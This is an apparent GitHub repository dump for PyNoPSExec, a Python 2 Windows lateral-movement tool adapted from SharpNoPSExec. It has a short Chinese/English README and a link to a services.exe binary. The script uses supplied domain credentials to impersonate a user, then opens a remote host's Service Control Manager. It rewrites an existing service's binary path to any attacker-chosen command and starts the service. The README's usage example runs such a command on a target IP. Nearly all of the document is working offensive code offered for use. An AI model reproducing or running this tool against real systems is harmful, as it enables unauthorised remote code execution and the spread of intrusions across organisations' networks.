├── PyNoPSExec.py ├── README.md └── services.exe /PyNoPSExec.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | # Author: bobac 3 | # Reference: SharpNoPSExec Twitter: @juliourena 4 | # Version: v1.0 5 | # Lateral Movement Tools 6 | 7 | # Include Lib Files Or Packages 8 | import ctypes 9 | from ctypes import wintypes 10 | from optparse import OptionParser 11 | 12 | # Export Functions From 13 | LogonUser = ctypes.windll.advapi32.LogonUserW 14 | ImpersonateLoggedOnUser = ctypes.windll.advapi32.ImpersonateLoggedOnUser # 15 | OpenSCManager = ctypes.windll.advapi32.OpenSCManagerW 16 | OpenService = ctypes.windll.advapi32.OpenServiceW 17 | ChangeServiceConfig = ctypes.windll.advapi32.ChangeServiceConfigW 18 | StartService = ctypes.windll.advapi32.StartServiceA 19 | GetLastError = ctypes.windll.kernel32.GetLastError 20 | 21 | # Defined Some Global Variables 22 | Token = ctypes.wintypes.HANDLE() 23 | 24 | if __name__ == '__main__': 25 | parser = OptionParser() 26 | parser.add_option("-t", "--target", dest="target", help="Please Input Target Machinename Or Ip Address!") 27 | parser.add_option("-d", "--domain", dest="domain", help="Please Input Domain!") 28 | parser.add_option("-u", "--username", dest="username", help="Please Input Username!") 29 | parser.add_option("-p", "--password", dest="password", help="Please Input Password!") 30 | parser.add_option("-s", "--service", dest="service", help="Please Input Service Name!") 31 | parser.add_option("-e", "--exploit", dest="exploit", help="Please Input Exploit Payload!") 32 | (options, args) = parser.parse_args() 33 | 34 | if options.target in [None, "", " "]: 35 | print "[-] Please Input Target Machinename Or Ip Address!" 36 | exit(0) 37 | 38 | if options.service in [None, "", " "] or options.exploit in [None, "", " "]: 39 | print "[-] Please Check Service Name And Exploit Payload!" 40 | exit(0) 41 | 42 | if options.domain in [None, "", " "] or options.username in [None, "", " "] or options.password in [None, "", " "]: 43 | print "[-] Please Check Username And Password And Domain Information!" 44 | exit(0) 45 | 46 | print "[+] Target: %s" % str(options.target) 47 | 48 | domain = ctypes.wintypes.LPCWSTR(options.domain) 49 | username = ctypes.wintypes.LPCWSTR(options.username) 50 | password = ctypes.wintypes.LPCWSTR(options.password) 51 | logon_type = ctypes.wintypes.DWORD(2) 52 | provider = ctypes.wintypes.DWORD(0) 53 | result = LogonUser(username, domain, password, logon_type, provider, ctypes.byref(Token)) 54 | if result == 0: 55 | error = GetLastError() 56 | print "[-] Logon Failed! We Get Windows System Error: %s" % str(error) 57 | exit(0) 58 | else: 59 | print "[+] Logon Succeed!" 60 | 61 | result = ImpersonateLoggedOnUser(Token) 62 | if result == 0: 63 | error = GetLastError() 64 | print "[-] ImpersonateLoggedOnUser Failed! We Get Windows System Error: %s" % str(error) 65 | exit(0) 66 | else: 67 | print "[+] ImpersonateLoggedOnUser Succeed!" 68 | 69 | target = ctypes.wintypes.LPCWSTR(options.target) 70 | desired_access = ctypes.wintypes.DWORD(0xF003F) 71 | result = OpenSCManager(target, None, desired_access) 72 | if result == 0: 73 | error = GetLastError() 74 | if error == 5: 75 | print "[-] We Need Administrator Privilege!" 76 | exit(0) 77 | else: 78 | print "[-] We Get Windows System Error: %s"%str(error) 79 | exit(0) 80 | else: 81 | print "[+] OpenSCManager Succeed!" 82 | 83 | scm_handle = ctypes.wintypes.SC_HANDLE(result) 84 | name = ctypes.wintypes.LPCWSTR(options.service) 85 | desired_access = ctypes.wintypes.DWORD(0xF01FF) 86 | service = OpenService(scm_handle, name, desired_access) 87 | 88 | print "[+] We Got Exploit Payload: %s"%str(options.exploit) 89 | 90 | service_type = ctypes.wintypes.UINT(0xFFFFFFFF) 91 | start_type = ctypes.wintypes.UINT(0x00000003) 92 | payload = ctypes.wintypes.LPCWSTR(options.exploit) 93 | result = ChangeServiceConfig(service, service_type, start_type, 0, payload, None, 0, None, None, None, None) 94 | if result == 0: 95 | error = GetLastError() 96 | print "[-] ChangeServiceConfig Failed! We Get Windows System Error: %s" % str(error) 97 | exit(0) 98 | else: 99 | print "[+] ChangeServiceConfig Succeed!" 100 | 101 | result = StartService(service, 0, None) 102 | error = GetLastError() 103 | if error == 1053: 104 | print "[+] Lateral Movement Is Succeed!" 105 | else: 106 | print "[-] We Got Windows System Error: %s"%str(error) 107 | 108 | 109 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PyNoPSExec 2 | **A Lateral Movement Tool Learned From SharpNoPSExec -- Twitter: @juliourena 根据@juliourena大神的SharpNOPsExec项目改写的横向移动工具** 3 | + Platform(平台): Windows 10 4 | + Language(语言): Python2 5 | ## 原理简介 6 | **通过修改服务启动的二进制文件路径,然后启动服务来执行,对服务的要求是:** 7 | + 没有运行的手动启动或禁止启动的服务 8 | + 服务没有依赖项 9 | + 该脚本没有提供服务二进制文件路径恢复功能,需要先记好对应路径,然后可以再次运行该脚本进行恢复,避免服务出问题 10 | + 关于查询服务可以使用impacket examples中的services.py 或者对应的exe程序 11 | ```bash 12 | .\services.exe sec/testuser:TestPassword@123@192.168.23.107 config -name AppMgmt 13 | ``` 14 | ![image](https://user-images.githubusercontent.com/11972644/117533063-371b2c80-b01d-11eb-918b-b36c820e6d7c.png) 15 | 16 | ## 使用方法 17 | 18 | 19 | ```bash 20 | net use \\192.168.23.107\admin$ "TestPassword@123" /user:testuser 21 | python PyNoPSexec.py -t 192.168.23.107 -u testuser -p "TestPassword@123" -d test.sec.com -s AppMgmt -e "c:\\windows\\system32\\cmd.exe /c echo hackedbybobac > c:\\bobac.txt" 22 | ``` 23 | ![image](https://user-images.githubusercontent.com/11972644/117527553-82264700-afff-11eb-9850-45ecbd997f98.png) 24 | ![image](https://user-images.githubusercontent.com/11972644/117527633-0bd61480-b000-11eb-955e-d8310d463090.png) 25 | 26 | 27 | -------------------------------------------------------------------------------- /services.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/b0bac/PyNoPSExec/742566009ef1e50efc027c647dfb6d9d3ad968fe/services.exe --------------------------------------------------------------------------------